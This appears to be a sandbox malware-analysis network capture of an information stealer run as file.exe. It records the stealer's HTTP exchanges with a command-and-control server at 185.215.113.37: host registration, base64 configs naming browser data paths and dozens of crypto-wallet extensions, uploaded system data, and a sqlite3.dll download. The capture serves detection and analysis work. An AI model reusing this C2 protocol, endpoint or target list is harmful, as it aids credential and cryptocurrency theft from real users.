Oct 24, 2024 19:29:22.526715040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:22.532232046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:22.813260078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:22.813332081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:22.858640909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:22.864340067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:23.640587091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:23.644092083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:23.674396038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:23.680275917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:23.969496012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:23.969537020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:23.969572067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:23.969650030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:23.969697952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:23.971143007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:23.976650000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:24.753976107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:24.754050016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:27.947253942 CEST	49730	80	192.168.2.4	185.215.113.37

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 19:29:48.428257942 CEST	53	49340	162.159.36.2	192.168.2.4
Oct 24, 2024 19:29:49.078262091 CEST	53	62982	1.1.1.1	192.168.2.4
Oct 24, 2024 19:29:55.458594084 CEST	53	57259	1.1.1.1	192.168.2.4

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.37	80	7284	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 19:29:03.931624889 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Oct 24, 2024 19:29:04.847244024 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 19:29:04.850766897 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBA Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 31 43 37 38 31 37 38 38 32 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 2d 2d 0d 0a Data Ascii: ------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="hwid"41C7817882D72284582127------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="build"doma------FCFBFHIEBKJKFHIEBFBA--
Oct 24, 2024 19:29:05.148772001 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 54 4e 6d 5a 44 6b 30 4d 47 59 78 5a 6d 4a 6c 5a 54 46 6c 4d 54 4e 6b 5a 44 56 6c 5a 57 45 31 4f 54 45 79 4e 57 52 68 5a 54 4e 68 4e 7a 45 30 4e 44 4d 77 5a 54 41 32 4f 54 64 68 5a 47 59 77 5a 47 51 30 4d 47 4a 6a 59 6a 6c 6b 4d 32 51 77 5a 47 45 35 4d 7a 41 30 4f 44 46 69 4f 44 41 31 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MTNmZDk0MGYxZmJlZTFlMTNkZDVlZWE1OTEyNWRhZTNhNzE0NDMwZTA2OTdhZGYwZGQ0MGJjYjlkM2QwZGE5MzA0ODFiODA1fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 24, 2024 19:29:05.150330067 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKF Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 2d 2d 0d 0a Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="message"browsers------HCFIJKKKKKFCAAAAFBKF--
Oct 24, 2024 19:29:05.436517000 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:05 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 24, 2024 19:29:05.436542988 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Oct 24, 2024 19:29:05.438244104 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAK Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 2d 2d 0d 0a Data Ascii: ------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="message"plugins------CFIEBKEHCAKFCBFIDAAK--
Oct 24, 2024 19:29:05.724539995 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:05 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 24, 2024 19:29:05.724586010 CEST	112	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtp
Oct 24, 2024 19:29:05.724625111 CEST	1236	IN	Data Raw: 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 Data Ascii: cGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9
Oct 24, 2024 19:29:05.724663973 CEST	1236	IN	Data Raw: 61 6d 39 38 4d 58 77 77 66 44 42 38 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 Data Ascii: am98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2p
Oct 24, 2024 19:29:05.724699020 CEST	1236	IN	Data Raw: 5a 32 70 6c 62 57 56 72 5a 57 4a 6b 63 47 56 76 61 32 4a 70 61 32 68 6d 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 46 79 64 47 6c 68 62 69 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d Data Ascii: Z2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3B
Oct 24, 2024 19:29:05.724734068 CEST	636	IN	Data Raw: 62 47 31 6e 59 57 35 6d 59 57 46 73 61 32 78 69 66 44 46 38 4d 48 77 77 66 45 4e 76 62 57 31 76 62 6b 74 6c 65 58 78 6a 61 47 64 6d 5a 57 5a 71 63 47 4e 76 59 6d 5a 69 62 6e 42 74 61 57 39 72 5a 6d 70 71 59 57 64 73 59 57 68 74 62 6d 52 6c 5a 48 Data Ascii: bG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR
Oct 24, 2024 19:29:05.725178003 CEST	1236	IN	Data Raw: 5a 32 56 6d 66 44 46 38 4d 48 77 77 66 45 31 31 62 48 52 70 64 6d 56 79 63 31 67 67 52 47 56 47 61 53 42 58 59 57 78 73 5a 58 52 38 5a 47 35 6e 62 57 78 69 62 47 4e 76 5a 47 5a 76 59 6e 42 6b 63 47 56 6a 59 57 46 6b 5a 32 5a 69 59 32 64 6e 5a 6d Data Ascii: Z2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV
Oct 24, 2024 19:29:05.726116896 CEST	416	IN	Data Raw: 59 57 78 73 5a 58 52 38 63 47 56 75 61 6d 78 6b 5a 47 70 72 61 6d 64 77 62 6d 74 73 62 47 4a 76 59 32 4e 6b 5a 32 4e 6a 5a 57 74 77 61 32 4e 69 61 57 35 38 4d 58 77 77 66 44 42 38 55 32 46 6d 5a 56 42 68 62 43 42 58 59 57 78 73 5a 58 52 38 59 58 Data Ascii: YWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1
Oct 24, 2024 19:29:05.728013039 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJ Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 2d 2d 0d 0a Data Ascii: ------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="message"fplugins------KFBAECBAEGDGDHIEHIJJ--
Oct 24, 2024 19:29:06.013905048 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:05 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 24, 2024 19:29:06.034410954 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBF Host: 185.215.113.37 Content-Length: 7075 Connection: Keep-Alive Cache-Control: no-cache
Oct 24, 2024 19:29:06.034497023 CEST	7075	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 Data Ascii: ------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 24, 2024 19:29:06.840106010 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:06 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 19:29:07.428432941 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 24, 2024 19:29:07.714376926 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:07 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 